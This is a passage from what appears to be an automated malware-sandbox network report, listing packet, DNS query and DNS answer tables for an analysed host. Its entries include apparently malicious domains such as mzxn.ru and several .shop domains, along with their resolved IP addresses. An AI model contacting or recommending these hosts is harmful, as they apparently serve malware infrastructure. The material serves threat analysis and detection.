Jul 27, 2024 07:33:00.266422033 CEST	51925	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:33:00.266566038 CEST	51925	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:33:00.266597033 CEST	51925	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:33:00.271661997 CEST	80	51925	177.222.41.236	192.168.2.5
Jul 27, 2024 07:33:00.271693945 CEST	80	51925	177.222.41.236	192.168.2.5
Jul 27, 2024 07:33:01.264168024 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:01.264297962 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:01.264384985 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:01.280246019 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:01.280294895 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:01.280325890 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:01.280342102 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:01.397231102 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:01.397331953 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:01.397427082 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:01.397906065 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:01.397942066 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:01.524010897 CEST	80	51925	177.222.41.236	192.168.2.5
Jul 27, 2024 07:33:01.524123907 CEST	80	51925	177.222.41.236	192.168.2.5
Jul 27, 2024 07:33:01.524189949 CEST	51925	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:33:01.524293900 CEST	51925	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:33:01.529261112 CEST	80	51925	177.222.41.236	192.168.2.5
Jul 27, 2024 07:33:02.053138971 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:02.053333044 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:02.055418015 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:02.055425882 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:02.055478096 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:02.055483103 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:02.055552959 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:02.055557966 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:02.055777073 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:02.055973053 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:02.096506119 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:03.082061052 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:03.082688093 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:03.082854986 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:03.160665035 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:03.160665035 CEST	51926	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:33:03.160701990 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:03.160727024 CEST	443	51926	167.235.128.153	192.168.2.5
Jul 27, 2024 07:33:03.267254114 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:03.267285109 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:03.267344952 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:03.267697096 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:03.267707109 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:03.893572092 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:03.893682003 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:03.896342993 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:03.896351099 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:03.896426916 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:03.896431923 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:03.896487951 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:03.896492004 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:03.897151947 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:03.897340059 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:03.940538883 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:05.305073977 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:05.305182934 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:05.305239916 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:05.321243048 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:05.321255922 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:05.321290016 CEST	51927	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:33:05.321295977 CEST	443	51927	107.173.160.137	192.168.2.5
Jul 27, 2024 07:33:05.423736095 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:05.423831940 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:05.423907042 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:05.424283028 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:05.424319983 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:06.064093113 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:06.064182043 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:06.066313982 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:06.066343069 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:06.066399097 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:06.066411018 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:06.066694021 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:06.066812038 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:06.108558893 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:07.321268082 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:07.321393967 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:07.321713924 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:07.333504915 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:07.333559036 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:07.333591938 CEST	51928	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:33:07.333607912 CEST	443	51928	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:10.304133892 CEST	51850	443	192.168.2.5	31.14.70.245

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 07:29:23.647927999 CEST	63892	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:29:24.677424908 CEST	63892	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:29:25.663705111 CEST	63892	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:29:27.454843998 CEST	53	63892	1.1.1.1	192.168.2.5
Jul 27, 2024 07:29:27.454900980 CEST	53	63892	1.1.1.1	192.168.2.5
Jul 27, 2024 07:29:27.454929113 CEST	53	63892	1.1.1.1	192.168.2.5
Jul 27, 2024 07:29:34.718735933 CEST	53	56576	162.159.36.2	192.168.2.5
Jul 27, 2024 07:29:35.224606991 CEST	63784	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:29:35.232059002 CEST	53	63784	1.1.1.1	192.168.2.5
Jul 27, 2024 07:29:57.701633930 CEST	57415	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:29:58.710407972 CEST	57415	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:29:59.710549116 CEST	57415	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:30:00.320858002 CEST	53	57415	1.1.1.1	192.168.2.5
Jul 27, 2024 07:30:00.320872068 CEST	53	57415	1.1.1.1	192.168.2.5
Jul 27, 2024 07:30:00.320878983 CEST	53	57415	1.1.1.1	192.168.2.5
Jul 27, 2024 07:30:14.162134886 CEST	52029	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:30:14.197671890 CEST	53	52029	1.1.1.1	192.168.2.5
Jul 27, 2024 07:30:29.634316921 CEST	61790	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:30:29.667974949 CEST	53	61790	1.1.1.1	192.168.2.5
Jul 27, 2024 07:30:32.797302961 CEST	59813	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:30:32.812053919 CEST	53	59813	1.1.1.1	192.168.2.5
Jul 27, 2024 07:30:37.788703918 CEST	64103	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:30:37.796659946 CEST	53	64103	1.1.1.1	192.168.2.5
Jul 27, 2024 07:30:40.052344084 CEST	57469	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:30:40.061866999 CEST	53	57469	1.1.1.1	192.168.2.5
Jul 27, 2024 07:32:29.744946957 CEST	61086	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:32:30.741205931 CEST	61086	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:32:31.755139112 CEST	61086	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:32:33.646505117 CEST	53	61086	1.1.1.1	192.168.2.5
Jul 27, 2024 07:32:33.646518946 CEST	53	61086	1.1.1.1	192.168.2.5
Jul 27, 2024 07:32:33.646526098 CEST	53	61086	1.1.1.1	192.168.2.5
Jul 27, 2024 07:33:11.467556953 CEST	58583	53	192.168.2.5	1.1.1.1
Jul 27, 2024 07:33:11.480741978 CEST	53	58583	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 07:29:23.647927999 CEST	192.168.2.5	1.1.1.1	0x3cfb	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:24.677424908 CEST	192.168.2.5	1.1.1.1	0x3cfb	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:25.663705111 CEST	192.168.2.5	1.1.1.1	0x3cfb	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:35.224606991 CEST	192.168.2.5	1.1.1.1	0x457b	Standard query (0)	206.23.85.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jul 27, 2024 07:29:57.701633930 CEST	192.168.2.5	1.1.1.1	0xba07	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:58.710407972 CEST	192.168.2.5	1.1.1.1	0xba07	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:59.710549116 CEST	192.168.2.5	1.1.1.1	0xba07	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:14.162134886 CEST	192.168.2.5	1.1.1.1	0x9a06	Standard query (0)	mussangroup.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:29.634316921 CEST	192.168.2.5	1.1.1.1	0x8ba7	Standard query (0)	funrecipebooks.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:32.797302961 CEST	192.168.2.5	1.1.1.1	0x3c4e	Standard query (0)	callosallsaospz.shop	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:37.788703918 CEST	192.168.2.5	1.1.1.1	0xb5c7	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:40.052344084 CEST	192.168.2.5	1.1.1.1	0x896	Standard query (0)	store4.gofile.io	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:29.744946957 CEST	192.168.2.5	1.1.1.1	0x1036	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:30.741205931 CEST	192.168.2.5	1.1.1.1	0x1036	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:31.755139112 CEST	192.168.2.5	1.1.1.1	0x1036	Standard query (0)	mzxn.ru	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:33:11.467556953 CEST	192.168.2.5	1.1.1.1	0xf203	Standard query (0)	liernessfornicsa.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454843998 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454900980 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:27.454929113 CEST	1.1.1.1	192.168.2.5	0x3cfb	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:29:35.232059002 CEST	1.1.1.1	192.168.2.5	0x457b	Name error (3)	206.23.85.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320858002 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320872068 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:00.320878983 CEST	1.1.1.1	192.168.2.5	0xba07	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:14.197671890 CEST	1.1.1.1	192.168.2.5	0x9a06	No error (0)	mussangroup.com		185.149.100.242	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:29.667974949 CEST	1.1.1.1	192.168.2.5	0x8ba7	No error (0)	funrecipebooks.com		162.0.235.84	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:32.812053919 CEST	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	callosallsaospz.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:32.812053919 CEST	1.1.1.1	192.168.2.5	0x3c4e	No error (0)	callosallsaospz.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:37.796659946 CEST	1.1.1.1	192.168.2.5	0xb5c7	No error (0)	rentry.co		104.26.3.16	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:37.796659946 CEST	1.1.1.1	192.168.2.5	0xb5c7	No error (0)	rentry.co		172.67.75.40	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:37.796659946 CEST	1.1.1.1	192.168.2.5	0xb5c7	No error (0)	rentry.co		104.26.2.16	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:30:40.061866999 CEST	1.1.1.1	192.168.2.5	0x896	No error (0)	store4.gofile.io		31.14.70.245	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646505117 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		102.189.6.13	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		186.182.55.44	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646518946 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		125.7.253.10	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:32:33.646526098 CEST	1.1.1.1	192.168.2.5	0x1036	No error (0)	mzxn.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
